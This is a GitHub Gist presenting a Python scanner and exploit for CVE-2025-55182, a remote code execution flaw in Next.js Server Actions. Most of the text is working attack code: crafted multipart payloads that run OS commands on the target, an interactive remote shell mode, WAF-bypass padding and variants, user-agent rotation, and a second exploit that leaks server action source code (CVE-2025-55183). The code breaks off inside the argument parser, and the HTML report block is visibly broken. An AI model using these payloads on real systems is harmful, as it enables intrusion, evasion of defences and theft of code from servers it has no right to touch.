Skip to content

Instantly share code, notes, and snippets.

@ThemeHackers
Created December 18, 2025 11:07
Show Gist options
  • Select an option

  • Save ThemeHackers/c6223a6ac26b5ce2c1b070c7118b7f4b to your computer and use it in GitHub Desktop.

Select an option

Save ThemeHackers/c6223a6ac26b5ce2c1b070c7118b7f4b to your computer and use it in GitHub Desktop.
Next.js RSC Remote Code Execution (RCE) Scanner & PoC

CVE-2025-55182: Next.js RSC Remote Code Execution (RCE) Scanner & PoC

CVE-2025-55182 is a critical vulnerability in Next.js React Server Components (RSC) that allows attackers to perform Remote Code Execution (RCE) through insecure handling of Server Actions.

This Gist includes:

  1. Vulnerability details and an example of vulnerable code.
  2. A Python script for scanning and proof-of-concept exploitation (Scanner/Exploit).

🚨 Vulnerability Details

This vulnerability occurs during the data processing of Server Actions in Next.js. If inputs (such as formData) are handled insecurely, an attacker can craft a special serialized object payload to execute OS commands on the server.

💻 Vulnerable Code Example

File: app/actions.js The following code demonstrates a Server Action that could be targeted by an attack:

'use server';
import { execSync } from 'child_process';

export async function vulnerableAction(formData) {
    console.log("Executable action triggered");
    try {
        // In a real-world scenario, processing formData or calling execSync 
        // directly can lead to exploitation via a malicious payload.
        const output = execSync('id').toString();
        return output;
    } catch (error) {
        return "Error executing command: " + error.message;
    }
}
import argparse
import sys
import json
import os
import random
import re
import string
import csv
import time
from datetime import datetime, timezone
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
from typing import Optional, Tuple
try:
import requests
from requests.exceptions import RequestException
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
except ImportError:
print("Error: 'requests' library required. Install with: pip install requests")
sys.exit(1)
try:
from rich.console import Console
from rich.table import Table
from rich.progress import Progress, SpinnerColumn, TextColumn, BarColumn, TaskProgressColumn
from rich.theme import Theme
except ImportError:
print("Error: 'rich' library required. Install with: pip install rich")
sys.exit(1)
custom_theme = Theme({
"info": "cyan",
"warning": "yellow",
"error": "red",
"success": "green",
"vuln": "bold red",
"safe": "green",
})
console = Console(theme=custom_theme)
class Colors:
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
MAGENTA = "\033[95m"
CYAN = "\033[96m"
WHITE = "\033[97m"
BOLD = "\033[1m"
RESET = "\033[0m"
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/121.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/121.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/121.0",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
]
def colorize(text: str, color: str) -> str:
if color == Colors.RED: return f"[red]{text}[/red]"
if color == Colors.GREEN: return f"[green]{text}[/green]"
if color == Colors.YELLOW: return f"[yellow]{text}[/yellow]"
if color == Colors.BLUE: return f"[blue]{text}[/blue]"
if color == Colors.MAGENTA: return f"[magenta]{text}[/magenta]"
if color == Colors.CYAN: return f"[cyan]{text}[/cyan]"
if color == Colors.WHITE: return f"[white]{text}[/white]"
if color == Colors.BOLD: return f"[bold]{text}[/bold]"
return text
def print_banner():
banner = "React2Shell Scanner - CVE-2025-55182/CVE-2025-66478"
console.print(banner, style="bold cyan")
def parse_headers(header_list):
headers = {}
if not header_list:
return headers
for header in header_list:
if ": " in header:
key, value = header.split(": ", 1)
headers[key] = value
elif ":" in header:
key, value = header.split(":", 1)
headers[key] = value.lstrip()
return headers
def normalize_host(host):
host = host.strip()
if not host:
return ""
if not host.startswith(("http://", "https://")):
host = f"https://{host}"
return host.rstrip("/")
def generate_junk_data(size_bytes):
param_name = ''.join(random.choices(string.ascii_lowercase, k=12))
junk = ''.join(random.choices(string.ascii_letters + string.digits, k=size_bytes))
return param_name, junk
def build_safe_payload():
boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
body = (
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="1"\r\n\r\n'
f"{{}}\r\n"
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="0"\r\n\r\n'
f'["$1:aa:aa"]\r\n'
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--"
)
content_type = f"multipart/form-data; boundary={boundary}"
return body, content_type
import waf_bypass_poc
def build_vercel_waf_bypass_payload(variant=None):
extra_headers = {}
if variant:
try:
result = waf_bypass_poc.get_bypass_payload(variant)
if len(result) == 3:
body, content_type, extra_headers = result
return body, content_type, extra_headers
else:
body, content_type = result
return body, content_type, {}
except ValueError as e:
console.print(f"[warning] Invalid variant {variant}: {e}. Falling back to default payload.[/warning]")
boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
part0 = (
'{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
'"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":'
'"var res=process.mainModule.require(\'child_process\').execSync(\'echo $((41*271))\').toString().trim();;'
'throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",'
'"_chunks":"$Q2","_formData":{"get":"$3:\\"$$:constructor:constructor"}}}'
)
body = (
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="0"\r\n\r\n'
f"{part0}\r\n"
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="1"\r\n\r\n'
f'"$@0"\r\n'
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="2"\r\n\r\n'
f"[]\r\n"
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="3"\r\n\r\n'
f'{{"\\"\u0024\u0024":{{}}}}\r\n'
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--"
)
content_type = f"multipart/form-data; boundary={boundary}"
return body, content_type, {}
def build_rce_payload(windows=False, waf_bypass=False, waf_bypass_size_kb=128):
return build_exploit_payload('41*271', windows, waf_bypass, waf_bypass_size_kb, is_custom_cmd=False)
def build_exploit_payload(cmd, windows=False, waf_bypass=False, waf_bypass_size_kb=128, is_custom_cmd=True):
boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
if windows and not is_custom_cmd:
cmd = 'powershell -c \\"41*271\\"'
elif is_custom_cmd:
if windows:
pass
else:
pass
else:
cmd = 'echo $((41*271))'
cmd_escaped = cmd.replace("'", "\\'")
prefix_payload = (
f"var res=process.mainModule.require('child_process').execSync('{cmd_escaped}',{{'timeout':5000}}).toString('base64');"
f"throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`NEXT_REDIRECT;push;/login?a=${{res}};307;`}});"
)
part0 = (
'{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
'"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"'
+ prefix_payload
+ '","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}'
)
parts = []
if waf_bypass:
param_name, junk = generate_junk_data(waf_bypass_size_kb * 1024)
parts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="{param_name}"\r\n\r\n'
f"{junk}\r\n"
)
parts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="0"\r\n\r\n'
f"{part0}\r\n"
)
parts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="1"\r\n\r\n'
f'"$@0"\r\n'
)
parts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="2"\r\n\r\n'
f"[]\r\n"
)
parts.append("------WebKitFormBoundaryx8jO2oVc6SWP3Sad--")
body = "".join(parts)
content_type = f"multipart/form-data; boundary={boundary}"
return body, content_type
def resolve_redirects(url, timeout, verify_ssl, proxies=None, max_redirects=5):
current_url = url
original_host = urlparse(url).netloc
for _ in range(max_redirects):
try:
response = requests.head(
current_url,
timeout=timeout,
verify=verify_ssl,
allow_redirects=False,
proxies=proxies
)
if response.status_code in (301, 302, 303, 307, 308):
location = response.headers.get("Location")
if location:
if location.startswith("/"):
parsed = urlparse(current_url)
current_url = f"{parsed.scheme}://{parsed.netloc}{location}"
else:
new_host = urlparse(location).netloc
if new_host == original_host:
current_url = location
else:
break
else:
break
else:
break
except RequestException:
break
return current_url
def send_payload(target_url, headers, body, timeout, verify_ssl, proxies=None):
try:
body_bytes = body.encode('utf-8') if isinstance(body, str) else body
response = requests.post(
target_url,
headers=headers,
data=body_bytes,
timeout=timeout,
verify=verify_ssl,
allow_redirects=False,
proxies=proxies
)
return response, None
except requests.exceptions.SSLError as e:
return None, f"SSL Error: {str(e)}"
except requests.exceptions.ConnectionError as e:
return None, f"Connection Error: {str(e)}"
except requests.exceptions.Timeout:
return None, "Request timed out"
except RequestException as e:
return None, f"Request failed: {str(e)}"
except Exception as e:
return None, f"Unexpected error: {str(e)}"
def interactive_shell(url, timeout, verify_ssl, proxies=None, windows=False, waf_bypass=False, waf_bypass_size_kb=128, custom_headers=None, random_agent=False, vercel_waf_bypass=False, bypass_variant=None):
parsed_url = urlparse(url)
target_host = parsed_url.netloc
console.print(f"[*] Starting interactive shell on {url}", style="info")
if vercel_waf_bypass and bypass_variant:
console.print(f"[*] Using WAF Bypass Variant: {bypass_variant}", style="info")
console.print("[*] Type 'exit' or 'quit' to stop", style="info")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0",
"Next-Action": "007138e0bfbdd7fe024391a1251fd5861f0b5145dc",
"X-Nextjs-Request-Id": "b5dce965",
"X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9",
}
if random_agent:
headers["User-Agent"] = random.choice(USER_AGENTS)
if custom_headers:
headers.update(custom_headers)
session = requests.Session()
session.verify = verify_ssl
session.proxies = proxies
target_url = url
while True:
try:
cmd = input(f"{Colors.BLUE}Shell>{Colors.RESET} ").strip()
if cmd.lower() in ['exit', 'quit']:
break
if not cmd:
continue
if vercel_waf_bypass and bypass_variant:
try:
cmd_escaped = cmd.replace("'", "\\'")
js_code = (
f"var res = process.mainModule.require('child_process').execSync('{cmd_escaped}',{{'timeout':5000}}).toString('base64');"
f"throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`NEXT_REDIRECT;push;/login?a=${{res}};307;`}});"
)
import waf_bypass_poc
result = waf_bypass_poc.get_bypass_payload(int(bypass_variant), js_code=js_code)
if len(result) == 3:
body, content_type, extra_headers_variant = result
headers.update(extra_headers_variant)
else:
body, content_type = result
headers["Content-Type"] = content_type
except Exception as e:
console.print(f"[!] Error generating variant payload: {e}. Falling back to standard.", style="warning")
body, content_type = build_exploit_payload(cmd, windows, waf_bypass, waf_bypass_size_kb, is_custom_cmd=True)
headers["Content-Type"] = content_type
else:
body, content_type = build_exploit_payload(cmd, windows, waf_bypass, waf_bypass_size_kb, is_custom_cmd=True)
headers["Content-Type"] = content_type
try:
body_bytes = body.encode('utf-8') if isinstance(body, str) else body
response = session.post(
target_url,
headers=headers,
data=body_bytes,
timeout=timeout,
allow_redirects=False
)
redirect_header = response.headers.get("X-Action-Redirect", "")
if response.status_code == 500 and 'E{"digest":' in response.text:
try:
match = re.search(r'E\{"digest":"(.*?)"\}', response.text, re.DOTALL)
if match:
output = match.group(1)
output = output.replace('\\n', '\n').replace('\\"', '"').replace('\\\\', '\\')
console.print(output)
else:
console.print("[-] Output pattern not found in response", style="warning")
except Exception as e:
console.print(f"[-] Error extracting output: {e}", style="warning")
else:
candidates = [
redirect_header,
response.headers.get("Location", "")
]
found = False
for source in candidates:
if not source: continue
match = re.search(r'login\?a=(.*?)(?:;|$)', source)
if match:
try:
import base64
from urllib.parse import unquote
output_b64 = match.group(1)
decoded = base64.b64decode(unquote(output_b64)).decode('utf-8', errors='ignore')
console.print(decoded)
found = True
break
except Exception as e:
console.print(f"[-] Failed to decode output: {e}", style="warning")
if not found:
console.print(f"[-] No output received (Status: {response.status_code})", style="warning")
except KeyboardInterrupt:
break
except Exception as e:
console.print(f"[!] Error sending command: {e}", style="error")
except KeyboardInterrupt:
break
console.print("\n[*] Exiting shell", style="info")
def is_vulnerable_safe_check(response):
if response.status_code != 500 or 'E{"digest"' not in response.text:
return False
server_header = response.headers.get("Server", "").lower()
has_netlify_vary = "Netlify-Vary" in response.headers
is_mitigated = (
has_netlify_vary
or server_header == "netlify"
or server_header == "vercel"
)
return not is_mitigated
def is_vulnerable_rce_check(response):
redirect_header = response.headers.get("X-Action-Redirect", "")
if redirect_header:
match = re.search(r'.*/login\?a=(.*?)(?:;|$)', redirect_header)
if match:
try:
import base64
from urllib.parse import unquote
output_b64 = match.group(1)
decoded = base64.b64decode(unquote(output_b64)).decode('utf-8', errors='ignore')
if "11111" in decoded:
return "VULNERABLE"
except Exception:
pass
if response.status_code == 500:
if "digest" in response.text or '1:E' in response.text:
if "3000801989" in response.text:
return "NOT_VULNERABLE_DIGEST"
return "POTENTIAL_BYPASS"
if "Application error" in response.text:
return "POTENTIAL_BYPASS"
return "NO_RCE"
def check_vulnerability(host, timeout, verify_ssl, custom_headers=None, safe_check=False, windows=False, waf_bypass=False, waf_bypass_size_kb=128, vercel_waf_bypass=False, bypass_variant=None, paths=None, proxies=None, delay=0, random_agent=False, follow_redirects=True):
if delay > 0:
time.sleep(delay)
result = {
"host": host,
"vulnerable": None,
"status_code": None,
"error": None,
"request": None,
"response": None,
"final_url": None,
"tested_url": None,
"timestamp": datetime.now(timezone.utc).isoformat() + "Z"
}
host = normalize_host(host)
if not host:
result["error"] = "Invalid or empty host"
return result
if paths:
test_paths = paths
else:
test_paths = ["/"]
if safe_check:
body, content_type = build_safe_payload()
extra_headers_from_payload = {}
is_vulnerable = is_vulnerable_safe_check
elif vercel_waf_bypass:
payload_result = build_vercel_waf_bypass_payload(variant=bypass_variant)
body, content_type = payload_result[0], payload_result[1]
extra_headers_from_payload = payload_result[2] if len(payload_result) > 2 else {}
is_vulnerable = is_vulnerable_rce_check
else:
body, content_type = build_rce_payload(windows=windows, waf_bypass=waf_bypass, waf_bypass_size_kb=waf_bypass_size_kb)
extra_headers_from_payload = {}
is_vulnerable = is_vulnerable_rce_check
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0",
"Next-Action": "007138e0bfbdd7fe024391a1251fd5861f0b5145dc",
"X-Nextjs-Request-Id": "b5dce965",
"Content-Type": content_type,
"X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9",
}
gzip_variants = [24, 26, 27, 28, 29, 30, 31, 43, 47, 51, 52, 53, 54, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 75, 86, 91, 92, 93, 94, 95, 96, 97, 98, 102]
if bypass_variant in gzip_variants:
headers["Content-Encoding"] = "gzip"
elif bypass_variant == 25 or bypass_variant == 44:
headers["Content-Encoding"] = "deflate"
if bypass_variant in [39, 40, 90]:
headers["Transfer-Encoding"] = "chunked"
if bypass_variant == 40:
headers["Content-Length"] = str(len(body))
if vercel_waf_bypass and extra_headers_from_payload:
headers.update(extra_headers_from_payload)
if random_agent:
headers["User-Agent"] = random.choice(USER_AGENTS)
if custom_headers:
headers.update(custom_headers)
def build_request_str(url: str) -> str:
parsed = urlparse(url)
req_str = f"POST {'/aaa' or '/aaa'} HTTP/1.1\r\n"
req_str += f"Host: {parsed.netloc}\r\n"
for k, v in headers.items():
req_str += f"{k}: {v}\r\n"
body_len = len(body) if hasattr(body, '__len__') else 0
req_str += f"Content-Length: {body_len}\r\n\r\n"
if isinstance(body, bytes):
req_str += "<binary data>"
else:
req_str += body
return req_str
def build_response_str(resp: requests.Response) -> str:
resp_str = f"HTTP/1.1 {resp.status_code} {resp.reason}\r\n"
for k, v in resp.headers.items():
resp_str += f"{k}: {v}\r\n"
resp_str += f"\r\n{resp.text[:5000]}"
return resp_str
for idx, path in enumerate(test_paths):
if not path.startswith("/"):
path = "/" + path
test_url = f"{host}{path}"
result["tested_url"] = test_url
result["final_url"] = test_url
result["request"] = build_request_str(test_url)
response, error = send_payload(test_url, headers, body, timeout, verify_ssl, proxies)
if error:
if not safe_check and error == "Request timed out":
result["vulnerable"] = False
result["error"] = error
if idx < len(test_paths) - 1:
continue
return result
if idx < len(test_paths) - 1:
continue
result["error"] = error
return result
elapsed_time = response.elapsed.total_seconds()
console.print(f"[DEBUG] Elapsed: {elapsed_time:.2f}s (Variant: {bypass_variant})")
if bypass_variant == 52 and elapsed_time > 2.5:
result["vulnerable"] = True
result["status_code"] = response.status_code
result["response"] = f"Response Time: {elapsed_time}s\n" + response.text[:500]
console.print(f"[bold red][VULNERABLE] {host} - RCE Confirmed via Timing (Variant 52, {elapsed_time:.2f}s)![/bold red]")
return result
result["status_code"] = response.status_code
result["response"] = build_response_str(response)
vuln_status = is_vulnerable(response)
if isinstance(vuln_status, str):
if vuln_status == "VULNERABLE":
result["vulnerable"] = True
result["status_code"] = response.status_code
result["response"] = response.text[:500]
console.print(f"[bold red][VULNERABLE] {host} - RCE Confirmed![/bold red]")
console.print("\n[bold yellow]=== HTTP Request ===[/bold yellow]")
req = response.request
console.print(f"[bold]{req.method} {req.url}[/bold]")
for k, v in req.headers.items():
console.print(f"{k}: {v}")
if req.body:
console.print("\n[dim]Body:[/dim]")
console.print(f"{req.body!r}")
console.print("\n[bold green]=== HTTP Response ===[/bold green]")
console.print(f"[bold]Status: {response.status_code}[/bold]")
for k, v in response.headers.items():
console.print(f"{k}: {v}")
console.print("\n[dim]Body:[/dim]")
console.print(f"{response.text}")
return result
elif vuln_status == "POTENTIAL_BYPASS":
result["vulnerable"] = False
result["potential_bypass"] = True
result["error"] = "Potential WAF Bypass (Server Error)"
result["status_code"] = response.status_code
result["response"] = response.text[:200]
console.print(f"[yellow][POTENTIAL BYPASS] {host} - Status: {response.status_code}[/yellow]")
elif vuln_status == "NOT_VULNERABLE_DIGEST":
result["vulnerable"] = False
result["potential_bypass"] = False
result["status_code"] = response.status_code
console.print(f"[green][NOT VULNERABLE] {host} - Status: {response.status_code} (Known Digest)[/green]")
elif vuln_status == "NO_RCE":
if response.status_code == 500:
result["vulnerable"] = False
result["potential_bypass"] = True
result["error"] = "Potential WAF Bypass (Server Error)"
result["status_code"] = response.status_code
console.print(f"[yellow][POTENTIAL BYPASS] {host} - Status: {response.status_code}[/yellow]")
else:
result["vulnerable"] = False
result["status_code"] = response.status_code
console.print(f"[green][NOT VULNERABLE] {host} - Status: {response.status_code}[/green]")
else:
result["vulnerable"] = False
result["status_code"] = response.status_code
console.print(f"[green][NOT VULNERABLE] {host} - Status: {response.status_code}[/green]")
elif vuln_status:
result["vulnerable"] = True
return result
if follow_redirects:
try:
redirect_url = resolve_redirects(test_url, timeout, verify_ssl, proxies=proxies)
if redirect_url != test_url:
response, error = send_payload(redirect_url, headers, body, timeout, verify_ssl, proxies)
if error:
continue
result["final_url"] = redirect_url
result["request"] = build_request_str(redirect_url)
result["status_code"] = response.status_code
result["response"] = build_response_str(response)
vuln_status = is_vulnerable(response)
if isinstance(vuln_status, str):
if vuln_status == "VULNERABLE":
result["vulnerable"] = True
return result
elif vuln_status:
result["vulnerable"] = True
return result
except Exception:
pass
result["vulnerable"] = False
return result
def check_cve_2025_55183(host, timeout, verify_ssl, proxies=None, custom_headers=None, random_agent=False):
host = normalize_host(host)
console.print(f"[*] Scanning {host} for CVE-2025-55183 (RSC Source Code Disclosure)...", style="info")
session = requests.Session()
session.verify = verify_ssl
session.proxies = proxies
base_headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
}
if random_agent:
base_headers["User-Agent"] = random.choice(USER_AGENTS)
if custom_headers:
base_headers.update(custom_headers)
try:
resp = session.get(host, headers=base_headers, timeout=timeout)
except RequestException as e:
console.print(f"[-] Failed to fetch base URL: {e}", style="error")
return
chunk_paths = re.findall(r'/_next/static/chunks/[^"\' >\s\\]+\.js', resp.text)
chunk_paths = list(set(chunk_paths))
if not chunk_paths:
console.print(f"[-] No chunk files found on {host} (Response len: {len(resp.text)})", style="warning")
return
console.print(f"[*] Found {len(chunk_paths)} chunks", style="info")
action_ids = set()
console.print("[*] Scanning main page for Action IDs...", style="info")
found_in_html = re.findall(r'([a-f0-9]{40,42})', resp.text)
if found_in_html:
unique_html_ids = set(found_in_html)
action_ids.update(unique_html_ids)
console.print(f"[*] Found {len(unique_html_ids)} Action IDs in HTML", style="info")
with Progress(
SpinnerColumn(),
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TaskProgressColumn(),
console=console,
transient=True
) as progress:
task = progress.add_task("[cyan]Scanning chunks...", total=len(chunk_paths))
for path in chunk_paths:
try:
chunk_url = f"{host}{path}" if path.startswith('/') else f"{host}/{path}"
c_resp = session.get(chunk_url, headers=base_headers, timeout=timeout)
found = re.findall(r'"([a-f0-9]{40,42})"', c_resp.text)
action_ids.update(found)
except Exception:
pass
progress.update(task, advance=1)
if not action_ids:
console.print(f"[-] No server action IDs found in chunks for {host}", style="warning")
return
console.print(f"[*] Found {len(action_ids)} Action IDs. Testing for source leak...", style="info")
chunk_found = False
with Progress(
SpinnerColumn(),
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TaskProgressColumn(),
console=console,
transient=True
) as progress:
task = progress.add_task("[cyan]Exploiting actions...", total=len(action_ids))
for action_id in action_ids:
boundary = "----SourceLeak"
payload = (
f"------SourceLeak\r\n"
f'Content-Disposition: form-data; name="0"\r\n\r\n'
f'["$F1"]\r\n'
f"------SourceLeak\r\n"
f'Content-Disposition: form-data; name="1"\r\n\r\n'
f'{{"id":"{action_id}","bound":null}}\r\n'
f"------SourceLeak--\r\n"
)
test_headers = base_headers.copy()
test_headers.update({
"Accept": "text/x-component",
"Content-Type": f"multipart/form-data; boundary={boundary}",
"Next-Action": action_id
})
try:
p_resp = session.post(host, data=payload, headers=test_headers, timeout=timeout)
if "text/x-component" in p_resp.headers.get("Content-Type", ""):
if "function" in p_resp.text:
if "function () { [omitted code] }" not in p_resp.text:
match = re.search(r'function [a-zA-Z_][a-zA-Z0-9_]*\([^)]*\)[^}]+\}', p_resp.text)
if match:
console.print(f"[bold red][VULNERABLE] {host} - Source Code Disclosure (Action: {action_id})[/bold red]")
snippet = match.group(0)
if len(snippet) > 500:
snippet = snippet[:500] + "..."
console.print(f"[cyan]Leaked Source Snippet:[/cyan]\n{snippet}")
chunk_found = True
except Exception:
pass
progress.update(task, advance=1)
if not chunk_found:
console.print(f"[green][NOT VULNERABLE] {host} - No source code leaked[/green]")
def load_hosts(hosts_file):
hosts = []
try:
with open(hosts_file, "r") as f:
for line in f:
host = line.strip()
if host and not host.startswith("#"):
hosts.append(host)
except FileNotFoundError:
console.print(f"[ERROR] File not found: {hosts_file}", style="error")
sys.exit(1)
except Exception as e:
console.print(f"[ERROR] Failed to read file: {e}", style="error")
sys.exit(1)
return hosts
def load_paths(paths_file):
paths = []
try:
with open(paths_file, "r") as f:
for line in f:
path = line.strip()
if path and not path.startswith("#"):
if not path.startswith("/"):
path = "/" + path
paths.append(path)
except FileNotFoundError:
console.print(f"[ERROR] File not found: {paths_file}", style="error")
sys.exit(1)
except Exception as e:
console.print(f"[ERROR] Failed to read file: {e}", style="error")
sys.exit(1)
return paths
def save_results(results: list[dict], output_file: str, file_format: str = "json", vulnerable_only: bool = True):
if vulnerable_only:
results = [r for r in results if r.get("vulnerable") is True]
if file_format == "json":
output = {
"scan_time": datetime.now(timezone.utc).isoformat() + "Z",
"total_results": len(results),
"results": results
}
try:
with open(output_file, "w") as f:
json.dump(output, f, indent=2)
console.print(f"\n[+] Results saved to: {output_file}", style="success")
except Exception as e:
console.print(f"\n[ERROR] Failed to save results: {e}", style="error")
elif file_format == "csv":
keys = ["timestamp", "host", "vulnerable", "status_code", "final_url", "error"]
try:
with open(output_file, "w", newline='') as f:
writer = csv.DictWriter(f, fieldnames=keys)
writer.writeheader()
for r in results:
writer.writerow({k: r.get(k) for k in keys})
console.print(f"\n[+] Results saved to: {output_file}", style="success")
except Exception as e:
console.print(f"\n[ERROR] Failed to save results: {e}", style="error")
elif file_format == "html":
try:
html_rows = ""
for r in results:
status_class = "vuln" if r.get("vulnerable") else "safe"
html_rows += f
html_content = f
with open(output_file, "w") as f:
f.write(html_content)
console.print(f"\n[+] Results saved to: {output_file}", style="success")
except Exception as e:
console.print(f"\n[ERROR] Failed to save results: {e}", style="error")
def print_result(result: dict, verbose: bool = False):
host = result["host"]
final_url = result.get("final_url")
tested_url = result.get("tested_url")
redirected = final_url and tested_url and final_url != tested_url
status_code = result.get('status_code')
response_headers = ""
if result.get("response"):
lines = result["response"].split("\r\n")
for line in lines:
lower_line = line.lower()
if lower_line.startswith(("server:", "x-vercel-id:", "via:", "x-cache:")):
response_headers += f"\n {line}"
if result["vulnerable"] is True:
msg = f"[vuln][VULNERABLE][/vuln] {host} - Status: {status_code}"
if redirected:
msg += f"\n -> Redirected to: {final_url}"
console.print(msg)
elif result["vulnerable"] is False:
if status_code == 500 and result.get("potential_bypass"):
console.print(f"[warning][POTENTIAL BYPASS / SERVER ERROR][/warning] {host} - Status: 500", style="warning")
console.print(f" [!] WAF might have been bypassed but payload failed execution.", style="info")
else:
msg = f"[safe][NOT VULNERABLE][/safe] {host}"
if status_code is not None:
msg += f" - Status: {status_code}"
else:
error_msg = result.get("error", "")
if error_msg:
msg += f" - {error_msg}"
console.print(msg)
if redirected and verbose:
msg += f"\n -> Redirected to: {final_url}"
else:
error_msg = result.get("error", "Unknown error")
console.print(f"[warning][ERROR][/warning] {host} - {error_msg}")
if verbose or status_code == 500:
if response_headers:
console.print(" Headers Analysis:", style="cyan")
console.print(response_headers)
if result.get("response"):
console.print(" Response snippet:", style="info")
response_text = result["response"]
parts = response_text.split("\r\n\r\n", 1)
if len(parts) > 1:
console.print(f" {parts[1][:500]}")
else:
lines = response_text.split("\r\n")[:20]
for line in lines:
console.print(f" {line}")
def main():
parser = argparse.ArgumentParser(
description="React2Shell Scanner",
formatter_class=argparse.RawDescriptionHelpFormatter
)
input_group = parser.add_mutually_exclusive_group(required=True)
input_group.add_argument(
"-u", "--url",
help="Single URL/host to check"
)
input_group.add_argument(
"-l", "--list",
help="File containing list of hosts (one per line)"
)
parser.add_argument(
"--exploit",
action="store_true",
help="Enter interactive shell mode (requires -u)"
)
parser.add_argument(
"--nextjs-rsc-source-code-disclosure",
action="store_true",
help="Check for Next.js RSC Server Function Source Code Disclosure (CVE-2025-55183)"
)
parser.add_argument(
"-t", "--threads",
type=int,
default=10,
help="Number of concurrent threads (default: 10)"
)
parser.add_argument(
"--timeout",
type=int,
default=10,
help="Request timeout in seconds (default: 10)"
)
parser.add_argument(
"-o", "--output",
help="Output file for results"
)
parser.add_argument(
"--format",
choices=["json", "csv", "html"],
default="json",
help="Output format (default: json)"
)
parser.add_argument(
"--all-results",
action="store_true",
help="Save all results to output file, not just vulnerable hosts"
)
parser.add_argument(
"-k", "--insecure",
default=True,
action="store_true",
help="Disable SSL certificate verification"
)
parser.add_argument(
"-H", "--header",
action="append",
dest="headers",
metavar="HEADER",
help="Custom header in 'Key: Value' format (can be used multiple times)"
)
parser.add_argument(
"-v", "--verbose",
action="store_true",
help="Verbose output (show response snippets for all hosts)"
)
parser.add_argument(
"-q", "--quiet",
action="store_true",
help="Quiet mode (only show vulnerable hosts)"
)
parser.add_argument(
"--no-color",
action="store_true",
help="Disable colored output"
)
parser.add_argument(
"--safe-check",
action="store_true",
help="Use safe side-channel detection instead of RCE PoC"
)
parser.add_argument(
"--windows",
action="store_true",
help="Use Windows PowerShell payload instead of Unix shell"
)
parser.add_argument(
"--waf-bypass",
action="store_true",
help="Add junk data to bypass WAF content inspection (default: 128KB)"
)
parser.add_argument(
"--waf-bypass-size",
type=int,
default=128,
metavar="KB",
help="Size of junk data in KB for WAF bypass (default: 128)"
)
parser.add_argument(
"--vercel-waf-bypass",
action="store_true",
help="Use Vercel WAF bypass payload variant"
)
parser.add_argument(
"--bypass-variant",
help="Select specific WAF bypass variant (1-100) or 'all' to try all variants when --vercel-waf-bypass is used"
)
parser.add_argument(
"--path",
action="append",
dest="paths",
help="Custom path to test (e.g., '/_next', '/api'). Can be used multiple times to test multiple paths"
)
parser.add_argument(
"--path-file",
help="File containing list of paths to test (one per line, e.g., '/_next', '/api')"
)
parser.add_argument(
"-x", "--proxy",
